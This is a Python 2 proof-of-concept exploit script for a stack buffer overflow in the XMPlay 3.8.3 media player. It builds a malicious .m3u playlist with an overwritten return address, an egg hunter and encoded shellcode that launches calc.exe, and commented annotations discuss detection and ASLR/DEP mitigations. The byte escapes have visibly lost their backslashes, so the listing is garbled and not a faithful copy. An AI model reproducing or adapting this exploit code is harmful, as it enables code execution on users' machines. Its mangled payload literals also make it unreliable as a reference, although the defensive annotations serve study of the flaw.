#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
# Date: 2018-12-19
# Exploit Author: s7acktrac3
# Vendor Homepage: https://www.xmplay.com/
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
# Version: 3.8.3 (latest)
# Tested on: Windows XP SP3
# CVE : Reserved
#
# Developer notified & delivered PoC but not interested in fixing :P
#
# Reproduction Steps:
# Launch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
# Either drag xmplay.m3u into the XMPlay window or File Menu-> select winamp.m3u. Application will "load"
# for a minute (exploit searching through memory for payload) and eventually launch calc.exe
#
# Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a
# beast!

from struct import pack

# ---------------------------------------------------------------------------
# Layout constants for the crafted playlist.
# This script is Python 2 (statement-form `print`, byte-oriented `str`);
# it does not run unmodified under Python 3.
#   max_size   - total length the payload is padded to with 'C' filler.
#   eip_offset - number of bytes that precede the value which overwrites the
#                saved return address (the pack("<L", ...) value further down).
# Defensive reading: the one entry XMPlay parses is a single URL of roughly
# 730 bytes consisting almost entirely of repeated 'A'/'C' filler behind an
# "http://test." prefix -- nothing a legitimate playlist contains, and a
# simple signature when screening .m3u files that arrive from untrusted
# sources.
# ---------------------------------------------------------------------------
max_size = 728
# Author's working path (backslashes apparently lost in transcription):
# C:\Documents and Settings\Administrator\Desktop\Exploit Dev\xmplay_383-poc.py
eip_offset = 500

# Standard extended-M3U header lines, followed by the start of the one
# playlist entry; the overlong "URL" that follows is what XMPlay mishandles.
file_header = "#EXTM3U "
file_header += "#EXTINF:200,Sleep Away "
file_header += "http://test."

# NOTE(review): the string literals in this block read "x4a..." with no
# backslash. The msfvenom line below implies the original used "\x.." byte
# escapes, so this listing appears to have lost them in transcription; as
# written the literals are plain ASCII text, and the lengths the padding
# arithmetic computes from them are not the ones the author's comments
# describe. Treat the page as a record of the technique, not a faithful copy
# of the original file.
#
# Egg hunter (alphanumeric-encoded by msfvenom, per the command below). The
# reproduction steps in the header say the application stalls "for a minute"
# while this stage scans memory for the marker -- a noticeable symptom if a
# user reports XMPlay hanging after opening a playlist.
# cat egghunter.txt | tr -d '"' | tr -d ' ' | tr -d '\x' | xxd -r -p > egghunter.bin
# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
encoded_egg_hunter = (""
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax37x52x59x6ax41x58x50x30x41x30x41x6bx41"
"x41x51x32x41x42x32x42x42x30x42x42x41x42x58x50"
"x38x41x42x75x4ax49x62x46x6fx71x4bx7ax49x6fx44"
"x4fx53x72x36x32x61x7ax46x62x66x38x78x4dx64x6e"
"x75x6cx75x55x63x6ax54x34x68x6fx6dx68x63x47x34"
"x70x54x70x72x54x4ex6bx58x7ax4ex4fx42x55x6bx5a"
"x4cx6fx31x65x78x67x59x6fx39x77x41x41")

# Second stage: the 8-byte marker the egg hunter searches for ("w00tw00t"),
# a short register-setup stub (author's inline comment), then the encoded
# calc.exe launcher the header's reproduction steps describe. It is placed
# early in the buffer, before the return-address slot.
encoded_calc = "w00tw00t" + "x57x58x04x06x50x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI
encoded_calc += "x56x59x49x49x49x49x49x49x49x49"
encoded_calc += "x49x49x49x49x49x49x49x49x37x51"
encoded_calc += "x5ax6ax41x58x50x30x41x30x41x6b"
encoded_calc += "x41x41x51x32x41x42x32x42x42x30"
encoded_calc += "x42x42x41x42x58x50x38x41x42x75"
encoded_calc += "x4ax49x36x51x49x59x52x71x61x78"
encoded_calc += "x75x33x50x61x72x4cx31x73x73x64"
encoded_calc += "x6ex58x49x57x6ax33x39x52x64x37"
encoded_calc += "x6bx4fx38x50x41x41"

# Stub that derives a pointer from ESP (per the inline comments) and leaves
# it in EDX -- the BufferRegister named in the msfvenom command above, which
# the encoded egg hunter expects to find its own location in.
egg_addr_to_edx = ""
egg_addr_to_edx += "x54" # PUSH ESP
egg_addr_to_edx += "x58" # POP EAX
egg_addr_to_edx += "x2Dx3Cx55x55x55" # SUB EAX,5555553C
egg_addr_to_edx += "x2Dx3Cx55x55x55" # SUB EAX,5555553C
egg_addr_to_edx += "x2Dx3Cx55x55x55" # SUB EAX,5555553C
egg_addr_to_edx += "x50" # PUSH eax
egg_addr_to_edx += "x5A" # POP EDX


# Assemble the overflowing entry, front to back.
payload = "A" * 12                              # leading filler
payload += encoded_calc                         # second stage + marker
payload += "A" * (eip_offset - len(payload))    # pad up to the return-address slot
print "Length of payload " + str(len(payload))
# Fixed absolute address of a "jmp esp" instruction in an OS DLL (author's
# comment), written little-endian. Mitigation note: a hard-coded address like
# this only works if that DLL loads at the same base every time; the header
# names Windows XP SP3 as the test platform, and address-space randomization
# on later Windows releases would be expected to break it, while DEP would be
# expected to block execution from the stack altogether.
payload += pack("<L", 0x78196d4d) # Jmp esp OS DLL
payload += "BBBB"                               # 4 filler bytes past the return address
payload += egg_addr_to_edx                      # ESP->EDX stub lands where "jmp esp" arrives
payload += "C" * (76 - len(egg_addr_to_edx) )   # fixed 76-byte region for stub + padding
payload += encoded_egg_hunter
payload += "C" * (max_size - len(payload))      # pad to max_size
# Single trailing character appended after the payload; the page gives no
# reason for it beyond the author's name for the variable.
stupid_char = "|"

print "[+] Creating .m3u file with payload size: "+ str(len(payload))
exploit = file_header + payload + stupid_char
# Writes xmplay.m3u into the current working directory. Style note: `file`
# shadows the builtin, the handle is closed by hand (a `with open(...)` block
# is the current idiom), and the close() call carries a stray ';'.
file = open('xmplay.m3u','w')
file.write(exploit)
file.close();
print "[+] Done creating the file"